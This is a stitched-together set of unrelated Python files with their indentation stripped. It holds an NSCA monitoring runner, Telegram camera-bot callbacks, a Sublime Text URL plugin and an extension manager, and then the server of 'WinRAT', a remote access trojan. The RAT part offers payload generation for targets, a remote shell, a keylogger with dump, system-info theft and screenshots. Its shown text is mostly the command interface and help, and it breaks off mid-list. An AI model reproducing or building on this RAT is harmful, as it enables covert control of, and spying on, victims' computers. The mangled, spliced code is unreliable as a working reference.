from multiprocessing import Process
import subprocess as sp
import socket
import sys
import argparse
import os
import pwd
import grp
nscaConfig = ""
sendNscaPath = "/usr/sbin/send_nsca"
def dropPrivileges(uid_name, gid_name=None):
if not gid_name:
gid_name = "nogroup"
target_uid = pwd.getpwnam(uid_name).pw_uid
target_gid = grp.getgrnam(gid_name).gr_gid
os.setgid(target_gid)
os.setuid(target_uid)
def splitCMD(cmd):
return list(filter(lambda a: a,cmd.strip("\n").split(" ")))
def executeAndSubmit(user, serviceName, cmd, noSudo):
if not noSudo:
        dropPrivileges(user)
message = ""
cmd = splitCMD(cmd)
# run monitoring command
try:
subP = sp.run(cmd, stdout=sp.PIPE, stderr=sp.PIPE)
message = "{}\t{}\t{}\t{}\n".format(hostname, serviceName, subP.returncode,
subP.stdout.decode("utf-8"))
except FileNotFoundError:
print("{} command not found!".format(splitCMD(cmd)[0]),file=sys.stderr)
# submitt the results
if nscaConfig:
nscaCMD = [sendNscaPath,'-c', nscaConfig]
else:
nscaCMD = [sendNscaPath]
p = sp.Popen(nscaCMD, stdout=sp.PIPE, stdin=sp.PIPE, stderr=sp.PIPE)
    stdout, stderr = p.communicate(input=bytes(message, "utf-8"))
if p.returncode != 0:
raise RuntimeError("Execution of send_nsca failed - {}".format(stdout))
def executeAndSubmitAsync(user, serviceName, cmd, noSudo):
p = Process(target=executeAndSubmit, args=(user,serviceName, cmd, noSudo,))
p.start()
return p
def executeConfig(hostname, filename, runAsync, noSudo):
asyncTasks = []
# parse config and start tasks
with open(filename,"r") as f:
for line in f:
splitted = list(filter(lambda x: x, line.split("\t")))
user, serviceName, cmd = splitted
p = executeAndSubmitAsync(user, serviceName, cmd, noSudo)
# run async or join directly
if runAsync:
asyncTasks += [p]
else:
p.join()
# wait for all processes to finish if was async
for task in asyncTasks:
task.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Icinga passive checks and curl report-ins.')
parser.add_argument('-H', '--hostname', help='Local Identity (often hostname)')
parser.add_argument('--nsca-config',
help='send-nsca configuration file (default set by nsca-package)')
parser.add_argument('--nsca-bin', default="/usr/sbin/send_nsca",
help='send-nsca executable (default: /usr/sbin/send_nsca)')
parser.add_argument('-c', '--config', dest='configurationFile', default="monitoring.conf",
help='Configuration file (default: ./monitoring.conf)')
parser.add_argument('-a', '--async', dest='runAsync', action="store_const",
const=True, default=False, help='Run checks asynchronous')
parser.add_argument('-u', '--ignore-user', dest='ignoreUser',
action="store_const", const=True, default=False,
help='Run as current user and ignore user column in config file')
parser.add_argument('-x', '--gateway', help='If set, use an async icinga checks gateway')
parser.add_argument('-t', '--gateway-token', help='Token to use with the gateway')
args = parser.parse_args()
if not args.hostname:
hostname = socket.gethostname()
else:
hostname = args.hostname
nscaConfig = args.nsca_config
sendNscaPath = args.nsca_bin
filename = args.configurationFile
noSudo = args.ignoreUser
executeConfig(hostname, filename, args.runAsync, noSudo)
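# Illustrative only: executeConfig() expects a tab-separated file with three
# columns per line: user, service name, command. The helper below is a sketch
# showing the expected shape; the path, user, and check command are placeholders.
def _write_example_config(path="monitoring.conf"):
    line = "\t".join([
        "nagios",                                              # user to run the check as
        "disk_root",                                           # passive service name
        "/usr/lib/nagios/plugins/check_disk -w 20% -c 10% /",  # check command
    ])
    with open(path, "w") as f:
        f.write(line + "\n")
# A matching invocation could look like:
#   python3 monitoring-report.py -H web01 -c monitoring.conf --nsca-config /etc/send_nsca.cfg -a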
callbacks.py
"""Camera callbacks module."""
import logging
from threading import Thread
from telegram.ext import run_async
from hikcamerabot.constants import Detections, Streams, Alarms, Events
from hikcamerabot.decorators import authorization_check, camera_selection
from hikcamerabot.utils import (build_commands_presentation, make_bold,
get_user_info)
log = logging.getLogger(__name__)
def error_handler(update, ctx):
"""Handle known Telegram bot API errors."""
log.exception('Got error: %s', ctx.error)
@authorization_check
@camera_selection
@run_async
def cmds(update, ctx, cam_id, cam_meta, event_id):
"""Print camera commands."""
cmd_help(update, ctx, append=True, requested=False, cam_id=cam_id)
@authorization_check
@camera_selection
@run_async
def cmd_getpic(update, ctx, cam_id, cam_meta, event_id):
"""Get and send resized snapshot from the camera."""
log.info('Resized cam snapshot from %s requested', cam_meta.description)
log.debug(get_user_info(update))
payload = {'event': Events.TAKE_SNAPSHOT,
'event_id': event_id,
'params': {'resize': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_getfullpic(update, ctx, cam_id, cam_meta, event_id):
"""Get and send full snapshot from the camera."""
log.info('Full cam snapshot requested')
log.debug(get_user_info(update))
payload = {'event': Events.TAKE_SNAPSHOT,
'event_id': event_id,
'params': {'resize': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@run_async
def cmd_stop(update, ctx):
"""Terminate bot."""
msg = f'Stopping {ctx.bot.first_name} bot'
log.info(msg)
log.debug(get_user_info(update))
update.message.reply_text(msg)
ctx.bot.thread_manager.stop_threads()
ctx.bot.proc_manager.stop_processes()
thread = Thread(target=ctx.bot.stop_polling)
thread.start()
@authorization_check
@run_async
def cmd_list_cams(update, ctx):
"""List user's cameras."""
log.info('Camera list has been requested')
cam_count = ctx.bot.cam_registry.get_count()
msg = [make_bold('You have {0} camera{1}'.format(
cam_count, '' if cam_count == 1 else 's'))]
for cam_id, meta in ctx.bot.cam_registry.get_all().items():
presentation = build_commands_presentation(ctx.bot, cam_id)
msg.append(
'<b>Camera:</b> {0}\n'
'<b>Description:</b> {1}\n'
'<b>Commands</b>\n'
'{2}'.format(cam_id, meta['conf'].description, presentation))
update.message.reply_html('\n\n'.join(msg))
log.info('Camera list has been sent')
@authorization_check
@camera_selection
@run_async
def cmd_intrusion_detection_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Intrusion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.INTRUSION,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_intrusion_detection_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Intrusion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.INTRUSION,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_motion_detection_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Motion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.MOTION,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_motion_detection_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Motion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.MOTION,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_line_detection_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Line Crossing Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.LINE,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_line_detection_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Line Crossing Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.LINE,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_yt_on(update, ctx, cam_id, cam_meta, event_id):
"""Start YouTube stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.YOUTUBE,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_yt_off(update, ctx, cam_id, cam_meta, event_id):
"""Stop YouTube stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.YOUTUBE,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_icecast_on(update, ctx, cam_id, cam_meta, event_id):
"""Start Icecast stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.ICECAST,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_icecast_off(update, ctx, cam_id, cam_meta, event_id):
"""Stop Icecast stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.ICECAST,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_alert_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Alert Mode."""
log.info('Enabling camera\'s alert mode requested')
log.debug(get_user_info(update))
payload = {'event': Events.CONFIGURE_ALARM,
'event_id': event_id,
'name': Alarms.ALARM,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_alert_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Alert Mode."""
log.info('Disabling camera\'s alert mode requested')
log.debug(get_user_info(update))
payload = {'event': Events.CONFIGURE_ALARM,
'event_id': event_id,
'name': Alarms.ALARM,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@run_async
def cmd_help(update, ctx, append=False, requested=True, cam_id=None):
"""Send help message to telegram chat."""
if requested:
log.info('Help message has been requested')
log.debug(get_user_info(update))
update.message.reply_text(
'Use /list command to list available cameras and commands\n'
'Use /stop command to fully stop the bot')
elif append:
presentation = build_commands_presentation(ctx.bot, cam_id)
update.message.reply_html(
f'<b>Available commands</b>\n\n{presentation}\n\n/list cameras')
log.info('Help message has been sent')
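# A minimal sketch, not part of callbacks.py: how a few of the callbacks above
# could be wired into a python-telegram-bot (12.x style) dispatcher. The token is
# a placeholder; the real bot registers its handlers elsewhere.
def _example_register_handlers(token='BOT_TOKEN'):
    from telegram.ext import Updater, CommandHandler
    updater = Updater(token, use_context=True)
    dispatcher = updater.dispatcher
    dispatcher.add_handler(CommandHandler('help', cmd_help))
    dispatcher.add_handler(CommandHandler('list', cmd_list_cams))
    dispatcher.add_handler(CommandHandler('stop', cmd_stop))
    dispatcher.add_error_handler(error_handler)
    updater.start_polling()
    updater.idle()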
open_url.py
# Open URL opens selected URLs, files, and folders, or looks up the selected text with a web searcher
import sublime
import sublime_plugin
import webbrowser
import threading
import os
import subprocess
import platform
from urllib.parse import urlparse
from urllib.parse import quote
from .url import is_url
def prepend_scheme(s):
o = urlparse(s)
if not o.scheme:
s = 'http://' + s
return s
def remove_trailing_delimiter(url, trailing_delimiters):
"""Removes trailing delimiters.
Args:
url: A url that could potentially have some trailing characters that
need to be removed.
trailing_delimiters: A string of characters that should not be seen at
the end of a URL.
Returns:
The input url with the trailing delimiting characters removed; if any
are found.
"""
if not trailing_delimiters:
return url
while url:
if url[-1] in trailing_delimiters:
url = url[:-1]
else:
break
return url
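# Illustrative only, not used by the plugin: expected behaviour of the two
# helpers above.
def _url_helper_examples():
    assert prepend_scheme('example.com') == 'http://example.com'
    assert prepend_scheme('https://example.com') == 'https://example.com'
    assert remove_trailing_delimiter('http://example.com).', ').') == 'http://example.com'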
class OpenUrlCommand(sublime_plugin.TextCommand):
def run(self, edit=None, url=None, show_menu=True):
self.config = sublime.load_settings('open_url.sublime-settings')
# Sublime Text has its own open_url command used for things like Help > Documentation
# so if a url is passed, open it instead of getting text from the view
if url is None:
url = self.get_selection()
path = self.abs_path(url)
if os.path.isfile(path):
self.file_action(path, show_menu)
return
if os.path.isdir(path):
self.folder_action(path, show_menu)
return
if is_url(url):
url = prepend_scheme(url)
url = remove_trailing_delimiter(url, self.config.get('trailing_delimiters'))
self.open_tab(url)
else:
self.modify_or_search_action(url)
def get_selection(self):
"""Returns selection. If selection contains no characters, expands it
until hitting delimiter chars.
"""
s = self.view.sel()[0]
start = s.begin()
end = s.end()
if start != end:
return self.view.substr(sublime.Region(start, end)).strip()
        # nothing is selected, so expand selection to the nearest delimiters
view_size = self.view.size()
delimeters = list(self.config.get('delimiters'))
# move the selection back to the start of the url
while start > 0:
if self.view.substr(start - 1) in delimeters:
break
start -= 1
# move end of selection forward to the end of the url
while end < view_size:
if self.view.substr(end) in delimeters:
break
end += 1
return self.view.substr(sublime.Region(start, end)).strip()
def abs_path(self, path):
"""Attempts to convert path into absolute path.
"""
path = os.path.expandvars(os.path.expanduser(path))
if os.path.isabs(path):
return path
file_path = self.view.file_name()
if file_path: # this file has been saved to disk
abs_path = os.path.join(os.path.dirname(file_path), path)
if os.path.exists(abs_path): # if file relative to current view exists, open it, else continue
return abs_path
project = self.view.window().project_data()
if project is None: # nothing more to try
return path
try: # look for file relative to project root
return os.path.join(os.path.expanduser(project['folders'][0]['path']), path)
except (KeyError, IndexError):
return path
def run_subprocess(self, args):
"""Runs on another thread to avoid blocking main thread.
"""
def sp(args):
subprocess.check_call(args, shell=not isinstance(args, list))
threading.Thread(target=sp, args=(args,)).start()
def open_tab(self, url):
browser = self.config.get('web_browser', "")
def ot(url, browser):
try:
controller = webbrowser.get(browser or None)
except:
e = 'Python couldn\'t find the "{}" browser on your machine. Change "web_browser" in Open URL\'s settings.'
sublime.error_message(e.format(browser or 'default'))
return
controller.open_new_tab(url)
threading.Thread(target=ot, args=(url, browser)).start()
def modify_or_search_action(self, term):
"""Not a URL and not a local path; prompts user to modify path and looks
for it again, or searches for this term using a web searcher.
"""
searchers = self.config.get('web_searchers', [])
opts = ['modify path ({})'.format(term)]
opts += ['{} ({})'.format(s['label'], term) for s in searchers]
sublime.active_window().show_quick_panel(opts, lambda idx: self.modify_or_search_done(idx, searchers, term))
def modify_or_search_done(self, idx, searchers, term):
if idx < 0:
return
if idx == 0:
self.view.window().show_input_panel('URL or path:', term, self.url_search_modified, None, None)
return
idx -= 1
searcher = searchers[idx]
self.open_tab('{}{}'.format(
searcher.get('url'),
quote(term.encode(searcher.get('encoding', 'utf-8'))),
))
def folder_action(self, folder, show_menu=True):
if not show_menu:
self.reveal(folder)
return
openers = self.config.get('folder_custom_commands', [])
extra = self.config.get('folder_extra_commands', True)
extra = ['add to sublime project', 'new sublime window'] if extra else []
opts = ['reveal'] + extra + [opener.get('label') for opener in openers]
sublime.active_window().show_quick_panel(opts, lambda idx: self.folder_done(idx, opts, folder))
def folder_done(self, idx, opts, folder):
if idx < 0:
return
if idx == 0:
self.reveal(folder)
return
extra = self.config.get('folder_extra_commands', True)
if not extra:
idx += 2
if idx == 1: # add folder to project
d = self.view.window().project_data()
if not d:
d = {}
if 'folders' not in d:
d['folders'] = []
d['folders'].append({'path': folder})
self.view.window().set_project_data(d)
elif idx == 2:
self.open_in_new_window(folder)
else: # custom opener was used
openers = self.config.get('folder_custom_commands', [])
commands = openers[idx-3].get('commands')
self.run_subprocess(commands + [folder])
def reveal(self, path):
spec = {
'dir': {'Darwin': ['open'], 'Windows': ['explorer'], 'Linux': ['nautilus', '--browser']},
'file': {
'Darwin': ['open', '-R'],
'Windows': ['explorer', '/select,"<path>"'],
'Linux': ['nautilus', '--browser'],
}
}
        if platform.system() not in spec['dir']:
            raise Exception('unsupported os')
args = spec['dir' if os.path.isdir(path) else 'file'][platform.system()]
        if '<path>' in args[-1]:
            args[-1] = args[-1].replace('<path>', path)
else:
args.append(path)
subprocess.Popen(args)
def url_search_modified(self, text):
"""Call open_url again on modified path.
"""
try:
self.view.run_command('open_url', {'url': text})
except ValueError:
pass
def file_action(self, path, show_menu=True):
"""Asks user if they'd like to edit or run the file.
"""
if not show_menu:
self.view.window().open_file(path)
return
action = 'menu'
autoinfo = None
# see if there's already an action defined for this file
for auto in self.config.get('autoactions'):
            # see if this entry applies to this operating system
if 'os' in auto:
oscheck = auto['os'] == 'any' \
or (auto['os'] == 'win' and platform.system() == 'Windows') \
or (auto['os'] == 'lnx' and platform.system() == 'Linux') \
or (auto['os'] == 'mac' and platform.system() == 'Darwin') \
or (auto['os'] == 'psx' and (platform.system() == 'Darwin' or platform.system() == 'Linux'))
else:
oscheck = True
# if the line is for this OS, then check to see if we have a file pattern match
if oscheck:
for ending in auto['endswith']:
if (path.endswith(ending)):
action = auto['action']
autoinfo = auto
break
# either show a menu or perform the action
if action == 'menu':
openers = self.config.get('file_custom_commands', [])
extra = self.config.get('file_extra_commands', True)
extra = ['run', 'new sublime window', 'system open'] if extra else []
sublime.active_window().show_quick_panel(
['edit', 'reveal'] + extra + [opener.get('label') for opener in openers],
lambda idx: self.file_done(idx, autoinfo, path),
)
elif action == 'edit':
self.file_done(0, autoinfo, path)
elif action == 'run':
self.file_done(1, autoinfo, path)
else:
            raise Exception('unsupported action')
def runfile(self, autoinfo, path):
plat = platform.system()
# default methods to open files
defrun = {'Darwin': 'open', 'Windows': '', 'Linux': 'mimeopen'}
if plat not in defrun:
            raise Exception('unsupported os')
# check if there are special instructions to open this file
if autoinfo is None or 'openwith' not in autoinfo:
if autoinfo is not None and plat == 'Darwin' and 'app' in autoinfo:
cmd = "%s -a %s %s" % self.quote((defrun[plat], autoinfo['app'], path))
elif defrun[platform.system()]:
cmd = "%s %s" % self.quote((defrun[platform.system()], path))
else:
cmd = self.quote(path)
else:
cmd = "%s %s" % self.quote((autoinfo['openwith'], path))
# run command in a terminal and pause if desired
if autoinfo and 'terminal' in autoinfo and autoinfo['terminal']:
pause = 'pause' in autoinfo and autoinfo['pause']
xterm = {'Darwin': '/opt/X11/bin/xterm', 'Linux': '/usr/bin/xterm'}
if plat in xterm:
cmd = [xterm[plat], '-e', cmd + ('; read -p "Press [ENTER] to continue..."' if pause else '')]
elif os.name == 'nt':
# subprocess.call has an odd behavior on windows in that if a parameter contains quotes
# it tries to escape the quotes by adding a slash in front of each double quote
# so c:\temp\hello.bat if passed to subprocess.call as "c:\temp\hello.bat"
# will be passed to the OS as \"c:\temp\hello.bat\"
                # Windows doesn't know how to interpret that, so we need to remove the double quotes,
# which breaks files with spaces in their path
cmd = [
'c:\\windows\\system32\\cmd.exe', '/c', '%s%s' % (cmd.replace('"', ''), ' & pause' if pause else '')
]
else:
                raise Exception('unsupported os')
self.run_subprocess(cmd)
def file_done(self, idx, autoinfo, path):
if idx < 0:
return
if idx == 0:
self.view.window().open_file(path)
return
if idx == 1:
self.reveal(path)
return
extra = self.config.get('file_extra_commands', True)
if not extra:
idx += 3
if idx == 2:
self.runfile(autoinfo, path)
elif idx == 3:
self.open_in_new_window(path)
elif idx == 4:
self.system_open(path)
else: # custom opener was used
openers = self.config.get('file_custom_commands', [])
commands = openers[idx-5].get('commands')
self.run_subprocess(commands + [path])
def system_open(self, path):
        if sublime.platform() == 'osx':
            args = ['open', path]
        elif sublime.platform() == 'linux':
            args = ['xdg-open', path]  # open with the default application
        elif sublime.platform() == 'windows':
            # 'start' is a cmd.exe built-in, not an executable; use os.startfile
            os.startfile(path)
            return
        else:
            raise Exception('unsupported os')
        subprocess.Popen(args, cwd=os.path.dirname(path))
def quote(self, stuff):
if isinstance(stuff, str):
return '"' + stuff + '"'
elif isinstance(stuff, list):
return [self.quote(x) for x in stuff]
elif isinstance(stuff, tuple):
return tuple(self.quote(list(stuff)))
else:
            raise Exception('unsupported type')
def open_in_new_window(self, path):
items = []
executable_path = sublime.executable_path()
if sublime.platform() == 'osx':
app_path = executable_path[:executable_path.rfind('.app/')+5]
executable_path = app_path + 'Contents/SharedSupport/bin/subl'
# build arguments
path = os.path.abspath(path)
items.append(executable_path)
if os.path.isfile(path):
items.append(os.path.dirname(path))
items.append(path)
subprocess.Popen(items, cwd=items[1])
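# A minimal sketch, not part of the plugin: invoking the command above from
# Sublime's console or another plugin. The URL is a placeholder; show_menu=False
# opens files/folders directly instead of showing the quick panel.
def _example_invoke_open_url():
    view = sublime.active_window().active_view()
    view.run_command('open_url', {'url': 'https://github.com', 'show_menu': False})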
extension_manager.py
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import imp
import os
import threading
import time
import six
from oslo_log import log as logging
from rock import exceptions
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class ExtensionDescriptor(object):
"""Base class that defines the contract for extensions."""
@abc.abstractmethod
def get_name(self):
"""The name of the extension.
e.g. 'Host Management IP Ping'
"""
@abc.abstractmethod
def get_alias(self):
"""The alias for the extension.
e.g. 'host-mgmt-ping'
"""
@abc.abstractmethod
def get_description(self):
"""Friendly description for the extension.
e.g. 'Delay of ping to management IP of host.'
"""
@abc.abstractmethod
def periodic_task(self):
"""Task that you need to run periodically.
e.g. 'ping to xxx'
"""
@staticmethod
def period_decorator(interval=10):
def wrapper(func):
def _wrapper(*args, **kwargs):
result = None
while True:
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
used_time = round(end_time - start_time, 3)
if interval - used_time < 0:
LOG.warning("Plugin: %s run outlasted interval by"
" %.3f seconds." % (func.__module__,
used_time - interval))
time.sleep(0)
else:
time.sleep(interval - used_time)
return result
return _wrapper
return wrapper
class ExtensionManager(object):
"""Load extensions from the configured extension path.
"""
def __init__(self, path):
LOG.info('Initializing extension manager.')
self.path = path
self.extensions = {}
self.periodic_tasks = {}
self._load_all_extensions()
def _load_all_extensions(self):
"""Load extensions from the configured path.
The extension name is constructed from the module_name. If your
extension module is named widgets.py, the extension class within that
module should be 'Widgets'.
"""
for path in self.path.split(':'):
if os.path.exists(path):
self._load_all_extensions_from_path(path)
else:
LOG.error("Extension path '%s' doesn't exist!", path)
def _load_all_extensions_from_path(self, path):
for f in sorted(os.listdir(path)):
try:
LOG.debug('Loading extension file: %s', f)
mod_name, file_ext = os.path.splitext(os.path.split(f)[-1])
ext_path = os.path.join(path, f)
if file_ext.lower() == '.py' and not mod_name.startswith('_'):
mod = imp.load_source(mod_name, ext_path)
ext_name = mod_name[0].upper() + mod_name[1:]
new_ext_class = getattr(mod, ext_name, None)
if not new_ext_class:
LOG.warning('Did not find expected name '
'"%(ext_name)s" in %(file)s',
{'ext_name': ext_name,
'file': ext_path})
continue
new_ext = new_ext_class()
self.add_extension(new_ext)
except Exception as exception:
LOG.warning("Extension file %(f)s wasn't loaded due to "
"%(exception)s", {'f': f,
'exception': exception})
def add_extension(self, ext):
alias = ext.get_alias()
LOG.info('Loaded extension: %s', alias)
if alias in self.extensions:
raise exceptions.DuplicatedExtension(alias=alias)
self.extensions[alias] = ext
@ExtensionDescriptor.period_decorator(60)
def report_status(self):
current_thread_list = threading.enumerate()
thread_name = []
for thread in current_thread_list:
if thread.name in self.extensions:
thread_name.append(thread.name)
LOG.info("Current plugin threads: " + " ".join(thread_name))
        # If any extension thread exited unexpectedly, create a new
        # thread for it
none_thread_extensions = [i for i in self.extensions
if i not in thread_name]
if len(none_thread_extensions) > 0:
LOG.info("Recreating thread(s) for extension(s): " + " ".join(
none_thread_extensions))
for ext in none_thread_extensions:
task = getattr(self.extensions[ext], 'periodic_task')
task_name = ext
t = threading.Thread(target=task, name=task_name)
t.start()
def start_collect_data(self):
for extension in self.extensions:
task = getattr(self.extensions[extension], 'periodic_task')
task_name = extension
t = threading.Thread(target=task, name=task_name)
t.start()
t = threading.Thread(
target=self.report_status, name='Plugins-Status-Report')
t.start()
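# --- Usage sketch (assumption, not part of rock): wiring the manager up directly.
# The colon-separated plugin path below is hypothetical; in rock it would normally
# come from configuration.
if __name__ == '__main__':
    manager = ExtensionManager('/etc/rock/plugins:/opt/rock/plugins')
    manager.start_collect_data()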
|
server.py
|
import sys
import os
import socket
import time
import base64
import tabulate
import signal
import subprocess
import argparse
import shutil
import threading
import platform
import PyInstaller.__main__
from datetime import datetime
__LOGO__ = """
▒█░░▒█ ░▀░ █▀▀▄ ▒█▀▀█ ░█▀▀█ ▀▀█▀▀
▒█▒█▒█ ▀█▀ █░░█ ▒█▄▄▀ ▒█▄▄█ ░▒█░░
▒█▄▀▄█ ▀▀▀ ▀░░▀ ▒█░▒█ ▒█░▒█ ░▒█░░
%s v1.0 @muneebwanee
"""
__HELP_OVERALL__ = """usage: python3 WinRAT.py command [--help] [--option OPTION]
These are the commands available for usage:
bind Run the Server on machine and establish connections
generate Generate the Payload file for target platform
You can further get help on available commands by supplying the
'--help' argument. For example: 'python3 winrat.py generate --help'
will print the help manual for the generate command
"""
__HELP_BIND__ = """usage: python3 winrat.py bind [--address ADDRESS] [--port PORT]
Args Description
-h, --help Show Help for Bind command
-a, --address IP Address to Bind to
-p, --port Port Number on which to Bind
The bind command binds the server to the given address and port,
accepts incoming connections, and controls the connected clients
through the command interface
"""
__HELP_GENERATE__ = """
usage: python3 winrat.py generate [--address ADDRESS] [--port PORT] [--output OUTPUT]
Args Description
-h, --help Show Help Manual for generate command
-a, --address IP Address of server. [Connect to]
-p, --port Port of connecting server
-o, --output Output file to generate
-s, --source Do not generate compiled code;
output a Python source file instead.
--persistence Auto start on reboot [Under Development]
The generate command creates the payload file to be
executed on the client side. The payload establishes a
connection to the server and executes received commands.
"""
class PULL:
WHITE = '\033[1m\033[0m'
PURPLE = '\033[1m\033[95m'
CYAN = '\033[1m\033[96m'
DARKCYAN = '\033[1m\033[36m'
BLUE = '\033[1m\033[94m'
GREEN = '\033[1m\033[92m'
YELLOW = '\033[1m\033[93m'
RED = '\033[1m\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
LINEUP = '\033[F'
def __init__(self):
if not self.support_colors():
self.win_colors()
def support_colors(self):
plat = sys.platform
supported_platform = plat != 'Pocket PC' and (plat != 'win32' or \
'ANSICON' in os.environ)
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if not supported_platform or not is_a_tty:
return False
return True
def win_colors(self):
self.WHITE = ''
self.PURPLE = ''
self.CYAN = ''
self.DARKCYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.BOLD = ''
self.UNDERLINE = ''
self.END = ''
def get_com(self, mss=()):
if mss:
rtval = input(self.DARKCYAN + "$" + self.END + " [" + self.GREEN + mss[1].ip + self.END + ":" + self.RED + str(mss[1].port) + self.END + "] ")
else:
rtval = input(self.DARKCYAN + "$" + self.END + " ")
rtval = rtval.rstrip(" ").lstrip(" ")
return rtval
def print(self, mess):
print(self.GREEN + "[" + self.UNDERLINE + "*" + self.END + self.GREEN + "] " + self.END + mess + self.END)
def function(self, mess):
print(self.BLUE + "[" + self.UNDERLINE + ":" + self.END + self.BLUE + "] " + self.END + mess + self.END)
def error(self, mess):
print(self.RED + "[" + self.UNDERLINE + "!" + self.END + self.RED + "] " + self.END + mess + self.END)
def exit(self, mess=""):
sys.exit(self.RED + "[" + self.UNDERLINE + "~" + self.END + self.RED + "] " + self.END + mess + self.END)
def logo(self):
print(self.DARKCYAN + __LOGO__ % self.YELLOW + self.END)
def help_c_current(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('shell', 'Launch a New Terminal/Shell.'),
('keylogger', 'KeyLogger Module'),
('sysinfo', 'Dump System, Processor, CPU and Network Information'),
('screenshot', 'Take Screenshot on Target Machine and Save on Local'),
('exit', 'Exit from WinRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_general(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('exit', 'Exit from WinRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sessions(self):
sys.stdout.write("\n")
print("Info : Display connected sessions to the server!")
print("Arguments : None")
print("Example : \n")
print("$ sessions")
sys.stdout.write("\n")
def help_c_connect(self):
sys.stdout.write("\n")
print("Info : Connect to an available session!")
print("Arguments : Session ID")
print("Example : \n")
print("$ connect 56\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Type' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('ID', 'integer', 'ID of the sessions from the list')
]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_disconnect(self):
sys.stdout.write("\n")
print("Info : Disconnect current session!")
print("Arguments : None")
print("Example : \n")
print("$ disconnect")
sys.stdout.write("\n")
def help_c_clear(self):
sys.stdout.write("\n")
print("Info : Clear screen!")
print("Arguments : None")
print("Example : \n")
print("$ clear")
sys.stdout.write("\n")
def help_c_shell(self):
sys.stdout.write("\n")
print("Info : Launch a shell against client!")
print("Arguments : None")
print("Example : \n")
print("$ shell")
sys.stdout.write("\n")
def help_c_keylogger(self):
sys.stdout.write("\n")
print("Info : Keylogger Module!")
print("Arguments : on, off, dump")
print("Example : \n")
print("$ keylogger on")
print("$ keylogger off")
print("$ keylogger dump\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('on', 'Turn Keylogger on'),
('off', 'Turn Keylogger off'),
('dump', 'Dump keylogs')
